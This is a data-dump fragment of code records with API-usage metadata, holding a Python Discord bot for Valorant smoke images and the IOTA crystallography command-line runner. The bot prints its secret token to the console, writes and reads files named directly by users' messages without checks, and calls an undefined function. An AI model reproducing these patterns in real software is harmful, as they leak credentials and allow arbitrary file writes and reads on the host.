"line_number": 183, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 184, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 185, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 186, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 187, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 188, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 189, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 190, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 191, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 192, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 193, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 194, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 195, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 196, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 202, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 203, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 204, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 205, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 206, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 207, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 208, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 209, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 210, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 211, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 212, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 213, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 214, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 215, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 216, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 217, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 218, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 219, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 220, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 221, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 222, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 223, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 224, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 225, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 226, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 227, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 228, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 229, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 230, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 231, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 232, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 233, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 234, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 235, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 236, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 237, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 238, "usage_type": "name"}, 
{"api_name": "typing.Any", "line_number": 239, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 240, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 241, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 242, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 243, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 244, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 245, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 246, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 247, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 248, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 249, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 250, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 251, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 252, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 253, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 254, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 255, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 256, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 257, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 258, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 259, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 260, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 261, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 262, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 263, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 264, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 265, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 266, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 267, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 268, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 269, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 270, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 271, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 272, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 273, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 274, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 275, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 276, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 277, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 278, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 279, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 280, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 281, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 282, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 283, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 284, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 285, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 286, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 287, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 288, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 289, 
"usage_type": "name"}, {"api_name": "typing.Any", "line_number": 290, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 291, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 292, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 293, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 294, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 295, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 296, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 297, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 298, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 299, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 300, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 301, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 302, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 303, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 304, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 305, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 306, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 307, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 308, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 309, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 310, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 311, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 312, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 313, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 314, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 315, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 316, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 317, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 318, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 319, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 320, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 321, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 322, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 323, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 324, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 325, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 326, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 327, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 328, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 329, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 330, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 331, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 332, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 333, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 334, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 335, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 336, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 337, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 338, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 339, "usage_type": "name"}, {"api_name": "typing.Any", 
"line_number": 340, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 341, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 342, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 343, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 344, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 345, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 346, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 347, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 348, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 349, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 350, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 351, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 352, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 353, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 354, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 355, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 356, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 357, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 358, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 359, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 360, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 361, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 362, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 363, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 364, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 365, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 366, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 367, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 368, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 369, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 370, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 371, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 372, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 373, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 374, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 375, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 376, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 377, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 378, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 379, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 380, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 381, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 382, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 383, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 384, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 385, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 386, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 387, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 388, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 389, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 390, "usage_type": "name"}, 
{"api_name": "typing.Any", "line_number": 391, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 392, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 393, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 394, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 395, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 396, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 397, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 398, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 399, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 400, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 401, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 402, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 403, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 404, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 405, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 406, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 407, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 408, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 409, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 410, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 411, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 412, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 413, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 414, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 415, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 416, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 417, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 418, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 419, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 420, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 421, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 422, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 423, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 424, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 425, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 426, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 427, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 428, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 429, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 430, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 431, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 432, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 433, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 434, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 435, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 436, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 437, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 438, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 439, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 440, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 441, 
"usage_type": "name"}, {"api_name": "typing.Any", "line_number": 442, "usage_type": "name"}]} +{"seq_id": "11817236148", "text": "import os\n\nimport discord\nimport logging\nfrom dotenv import load_dotenv\nimport urllib\nimport requests\nimport img_analysis\n\nlogging.basicConfig(level=logging.INFO)\nload_dotenv()\nTOKEN = os.getenv('DISCORD_TOKEN')\nprint(TOKEN)\nclient = discord.Client()\n\nfilepath = \"~/Desktop/Bot_MK_I\"\n\n# Bot commands\ndef command(cmd):\n\tcmd_arr = cmd.split()\n\n\tif cmd_arr[0] == \"hello\":\n\t\treturn 'Hello!'\n\telif cmd_arr[0] == \"add\":\n\t\ttry:\n\t\t\treturn 'Answer is ' + str(float(cmd_arr[1]) + float(cmd_arr[2]))\n\t\texcept:\n\t\t\treturn 'Must add two numbers'\n\telif cmd_arr[0] == \"subtract\":\n\t\ttry:\n\t\t\treturn 'Answer is ' + str(float(cmd_arr[1]) - float(cmd_arr[2]))\n\t\texcept:\n\t\t\treturn 'Must add two numbers'\n\telif cmd_arr[0] == \"multiply\":\n\t\ttry:\n\t\t\treturn 'Answer is ' + str(float(cmd_arr[1]) * float(cmd_arr[2]))\n\t\texcept:\n\t\t\treturn 'Must add two numbers'\n\telif cmd_arr[0] == \"divide\":\n\t\ttry:\n\t\t\tif float(cmd_arr[2]) == 0.0:\n\t\t\t\treturn 'Cannot divide by zero'\n\t\t\treturn 'Answer is ' + str(float(cmd_arr[1]) / float(cmd_arr[2]))\n\t\texcept:\n\t\t\treturn 'Must add two numbers'\n\n\telse: \n\t\treturn 'Invalid or no command detected'\n\t\t\n# End bot commands\n\ndef smoke(image_name): \n return img_analysis.smoke(image_name)\n\ndef invert(image_name):\n return img_analysis.invert(image_name)\n\n@client.event\nasync def on_ready():\n print(f'{client.user} has connected to Discord!')\n\n@client.event\nasync def on_message(message):\n if message.author == client.user:\n return\n if message.content.startswith('$invert'):\n image_name = message.content.split()[1]\n image_url = message.attachments[0].url\n\n r = requests.get(image_url, stream=True)\n with open(image_name, 'wb') as f:\n for chunk in r.iter_content():\n f.write(chunk)\n\n ret_img_name = invert(image_name)\n await message.channel.send(file = discord.File(ret_img_name))\n if message.content.startswith('$analyze'):\n image_name = message.content.split()[1]\n # await message.channel.send(image_name)\n image_url = message.attachments[0].url\n\n r = requests.get(image_url, stream=True)\n with open(image_name, 'wb') as f:\n for chunk in r.iter_content():\n f.write(chunk)\n\n ret_img_name = analyze(image_name)\n # await message.channel.send(ret_img_name)\n # await message.channel.send(type(ret_img_name))\n # await message.channel.send(type(\"bind_analyzed.png\"))\n # f = discord.File(filepath = filepath, filename = \"bind_analyzed.png\")\n # e = discord.Embed()\n await message.channel.send(file = discord.File(ret_img_name))\n # await message.channel.send(file = discord.File(\"bind_analyzed.png\"))\n\n elif message.content.startswith('$show_map'):\n map_name = message.content.split()[1]\n await message.channel.send(file = discord.File(map_name + \".jpg\"))\n elif message.content.startswith('$'):\n output_msg = command(message.content[1:])\n await message.channel.send(output_msg)\n \n\nclient.run(TOKEN)", "repo_name": "joonlee20/ValorantSmokeBot", "sub_path": "bot_mk_i.py", "file_name": "bot_mk_i.py", "file_ext": "py", "file_size_in_byte": 3035, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 10, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 10, "usage_type": "attribute"}, {"api_name": "dotenv.load_dotenv", 
"line_number": 11, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "discord.Client", "line_number": 14, "usage_type": "call"}, {"api_name": "img_analysis.smoke", "line_number": 53, "usage_type": "call"}, {"api_name": "img_analysis.invert", "line_number": 56, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 70, "usage_type": "call"}, {"api_name": "discord.File", "line_number": 76, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 82, "usage_type": "call"}, {"api_name": "discord.File", "line_number": 93, "usage_type": "call"}, {"api_name": "discord.File", "line_number": 98, "usage_type": "call"}]} +{"seq_id": "25014099016", "text": "from __future__ import absolute_import, division, print_function\n\n\"\"\"\nAuthor : Lyubimov, A.Y.\nCreated : 10/12/2014\nLast Changed: 10/31/2019\nDescription : IOTA command-line module.\n\"\"\"\nimport time\nimport datetime\nimport hdf5plugin\n\nimport argparse\nfrom contextlib import contextmanager\n\nfrom libtbx import easy_pickle as ep\nimport dials.util.command_line as cmd\n\nfrom iota import iota_version, help_message, logo\nfrom iota.utils.utils import main_log, iota_exit\n\n\ndef parse_command_args():\n \"\"\"Parses command line arguments (only options for now)\"\"\"\n parser = argparse.ArgumentParser(\n prog=\"iota.run\",\n formatter_class=argparse.RawDescriptionHelpFormatter,\n description=(help_message),\n epilog=(\"\\n{:-^70}\\n\".format(\"\")),\n )\n parser.add_argument(\n \"path\",\n type=str,\n nargs=\"*\",\n default=None,\n help=\"Path to data or file with IOTA parameters\",\n )\n parser.add_argument(\n \"--version\",\n action=\"version\",\n version=\"IOTA {}\".format(iota_version),\n help=\"Prints version info of IOTA\",\n )\n parser.add_argument(\n \"-d\",\n \"--default\",\n action=\"store_true\",\n help=\"Generate default settings files and stop\",\n )\n parser.add_argument(\n \"--ha14\", action=\"store_true\", help=\"Run IOTA with old HA14 backend\"\n )\n parser.add_argument(\n \"--random\",\n type=int,\n nargs=1,\n default=0,\n help='Size of randomized subset, e.g. 
\"--random 10\"',\n )\n parser.add_argument(\n \"--range\",\n type=str,\n nargs=\"?\",\n default=None,\n help='Range of images, e.g.\"--range 1-5,25,200-250\"',\n )\n parser.add_argument(\n \"-o\",\n \"--out_type\",\n type=str,\n nargs=1,\n default=\"progress\",\n help=\"Type of stdout; default is progress bar in stdout\",\n )\n parser.add_argument(\n \"-n\",\n \"--nproc\",\n type=int,\n nargs=1,\n default=0,\n help='Specify a number of cores for a multiprocessor run\"',\n )\n parser.add_argument(\n \"--analyze\",\n type=str,\n nargs=\"?\",\n const=None,\n default=None,\n help=\"Use for analysis only; specify run number or folder\",\n )\n parser.add_argument(\n \"--run_path\",\n type=str,\n nargs=1,\n default=None,\n help=\"Path to a pre-initialized run\",\n )\n parser.add_argument(\n \"--tmp\", type=str, nargs=1, default=None, help=\"Path to temp folder\"\n )\n\n return parser\n\n\n@contextmanager # Will print start / stop messages around some processes\ndef prog_message(msg, prog=\"\", msg2=\"\", out_type=\"progress\"):\n if out_type == \"progress\":\n cmd.Command.start(msg)\n elif \"debug\" in out_type:\n print(\"DEBUG {}: {}\".format(prog, msg))\n elif out_type == \"gui_verbose\":\n print(\"IOTA {}: {}\".format(prog, msg))\n yield\n if out_type == \"progress\":\n if msg2:\n cmd.Command.end(\"{} -- DONE\".format(msg2))\n else:\n cmd.Command.end(\"{} -- DONE\".format(msg))\n else:\n if msg2:\n if out_type == \"debug\":\n print(\"DEBUG {}: {}\".format(prog, msg2))\n if out_type == \"gui_verbose\":\n print(\"IOTA {}: {}\".format(prog, msg2))\n\n\nfrom iota.base.processor import ProcessingBase\n\n\nclass Process(ProcessingBase):\n \"\"\"Processing script w/o using the init object.\"\"\"\n\n def __init__(self, out_type=\"silent\", **kwargs):\n ProcessingBase.__init__(self, **kwargs)\n\n self.prog_count = 0\n self.out_type = out_type\n\n # TODO: may not have a callback option with new MP\n def callback(self, result):\n \"\"\"Will add object file to tmp list for inclusion in info.\"\"\"\n if self.out_type == \"progress\":\n if self.prog_count < self.info.n_input_images:\n prog_step = 100 / self.info.n_input_images\n self.gs_prog.update(self.prog_count * prog_step)\n self.prog_count += 1\n else:\n self.gs_prog.finished()\n\n if result:\n # Write image object to file from main processing thread\n ep.dump(result.obj_file, result)\n\n # Write image object path to list\n with open(self.info.obj_list_file, \"a\") as olf:\n olf.write(\"{}\\n\".format(result.obj_file))\n\n def process(self):\n \"\"\"Run importer and/or processor.\"\"\"\n\n start_time = time.time()\n\n # Process images\n with prog_message(\n \"Processing {} images\".format(len(self.info.unprocessed)),\n prog=\"PROCESSING\",\n out_type=self.out_type,\n ):\n if self.out_type == \"progress\":\n self.prog_count = 0\n self.gs_prog = cmd.ProgressBar(title=\"PROCESSING\")\n img_objects = self.run_process(iterable=self.info.unprocessed)\n\n proc_time = datetime.timedelta(seconds=int(time.time() - start_time))\n hours, minutes, seconds = str(proc_time).split(\":\")\n main_log(\n self.info.logfile,\n \"Total processing time: {} hours, {} minutes, {} seconds\"\n \"\".format(hours, minutes, seconds),\n print_tag=False,\n )\n\n # Run analysis if not in GUI mode\n if not \"gui\" in self.out_type:\n with prog_message(\n \"Analyzing results\", prog=\"ANALYSIS\", out_type=self.out_type\n ):\n self.info.finished_objects = [o.obj_file for o in img_objects]\n self.run_analysis()\n\n if \"silent\" not in self.out_type:\n if self.info.have_results:\n 
print(\"\\n\".join(self.info.final_table))\n print(\"\\n\".join(self.info.uc_table))\n print(\"\\n\".join(self.info.summary))\n else:\n print(\"\\n **** NO IMAGES INTEGRATED! ****\")\n\n # Determine total runtime\n if not \"gui\" in self.out_type:\n runtime = datetime.timedelta(seconds=int(time.time() - start_time))\n hours, minutes, seconds = str(runtime).split(\":\")\n main_log(\n self.info.logfile,\n \"Total run time: {} hours, {} minutes, {} seconds\"\n \"\".format(hours, minutes, seconds),\n print_tag=True,\n )\n\n\n# ============================================================================ #\ndef entry_point():\n from iota.init.iota_init import initialize_interface, initialize_new_run\n\n args, phil_args = parse_command_args().parse_known_args()\n\n if args.run_path:\n from iota.base.info import ProcInfo\n\n info = ProcInfo.from_folder(args.run_path[0])\n proc = Process.for_existing_run(info=info, out_type=args.out_type[0])\n else:\n if args.out_type == \"progress\":\n print(logo)\n\n if not args.path:\n parse_command_args().print_help() # Print usage\n if args.default: # Write out default params and exit\n from iota.init.iota_input import print_params\n\n help_out, txt_out = print_params()\n print(\"\\n{:-^70}\\n\".format(\"IOTA Parameters\"))\n print(help_out)\n iota_exit()\n\n with prog_message(\"Interpreting input\", prog=\"UI INIT\", out_type=args.out_type):\n input_dict, phil, msg = initialize_interface(args, phil_args)\n if not (input_dict or phil):\n iota_exit(silent=(args.out_type == \"silent\"), msg=msg)\n\n with prog_message(\n \"Initializing run parameters\", prog=\"PARAM INIT\", out_type=args.out_type\n ):\n init_ok, info, msg = initialize_new_run(phil=phil, input_dict=input_dict)\n if not init_ok:\n iota_exit(silent=False, msg=msg)\n\n proc = Process.for_new_run(\n paramfile=info.paramfile, run_no=info.run_number, out_type=args.out_type\n )\n\n proc.run()\n\n\nif __name__ == \"__main__\":\n entry_point()\n", "repo_name": "ssrl-px/iota", "sub_path": "src/iota/command_line/iota_run.py", "file_name": "iota_run.py", "file_ext": "py", "file_size_in_byte": 8079, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "argparse.RawDescriptionHelpFormatter", "line_number": 27, "usage_type": "attribute"}, {"api_name": "iota.help_message", "line_number": 28, "usage_type": "name"}, {"api_name": "iota.iota_version", "line_number": 41, "usage_type": "argument"}, {"api_name": "dials.util.command_line.Command.start", "line_number": 108, "usage_type": "call"}, {"api_name": "dials.util.command_line.Command", "line_number": 108, "usage_type": "attribute"}, {"api_name": "dials.util.command_line", "line_number": 108, "usage_type": "name"}, {"api_name": "dials.util.command_line.Command.end", "line_number": 116, "usage_type": "call"}, {"api_name": "dials.util.command_line.Command", "line_number": 116, "usage_type": "attribute"}, {"api_name": "dials.util.command_line", "line_number": 116, "usage_type": "name"}, {"api_name": "dials.util.command_line.Command.end", "line_number": 118, "usage_type": "call"}, {"api_name": "dials.util.command_line.Command", "line_number": 118, "usage_type": "attribute"}, {"api_name": "dials.util.command_line", "line_number": 118, "usage_type": "name"}, {"api_name": "contextlib.contextmanager", "line_number": 105, "usage_type": "name"}, {"api_name": "iota.base.processor.ProcessingBase", "line_number": 130, 
"usage_type": "name"}, {"api_name": "iota.base.processor.ProcessingBase.__init__", "line_number": 134, "usage_type": "call"}, {"api_name": "iota.base.processor.ProcessingBase", "line_number": 134, "usage_type": "name"}, {"api_name": "libtbx.easy_pickle.dump", "line_number": 152, "usage_type": "call"}, {"api_name": "libtbx.easy_pickle", "line_number": 152, "usage_type": "name"}, {"api_name": "time.time", "line_number": 161, "usage_type": "call"}, {"api_name": "dials.util.command_line.ProgressBar", "line_number": 171, "usage_type": "call"}, {"api_name": "dials.util.command_line", "line_number": 171, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 174, "usage_type": "call"}, {"api_name": "time.time", "line_number": 174, "usage_type": "call"}, {"api_name": "iota.utils.utils.main_log", "line_number": 176, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 201, "usage_type": "call"}, {"api_name": "time.time", "line_number": 201, "usage_type": "call"}, {"api_name": "iota.utils.utils.main_log", "line_number": 203, "usage_type": "call"}, {"api_name": "iota.base.info.ProcInfo.from_folder", "line_number": 220, "usage_type": "call"}, {"api_name": "iota.base.info.ProcInfo", "line_number": 220, "usage_type": "name"}, {"api_name": "iota.logo", "line_number": 224, "usage_type": "argument"}, {"api_name": "iota.init.iota_input.print_params", "line_number": 231, "usage_type": "call"}, {"api_name": "iota.utils.utils.iota_exit", "line_number": 234, "usage_type": "call"}, {"api_name": "iota.init.iota_init.initialize_interface", "line_number": 237, "usage_type": "call"}, {"api_name": "iota.utils.utils.iota_exit", "line_number": 239, "usage_type": "call"}, {"api_name": "iota.init.iota_init.initialize_new_run", "line_number": 244, "usage_type": "call"}, {"api_name": "iota.utils.utils.iota_exit", "line_number": 246, "usage_type": "call"}]} 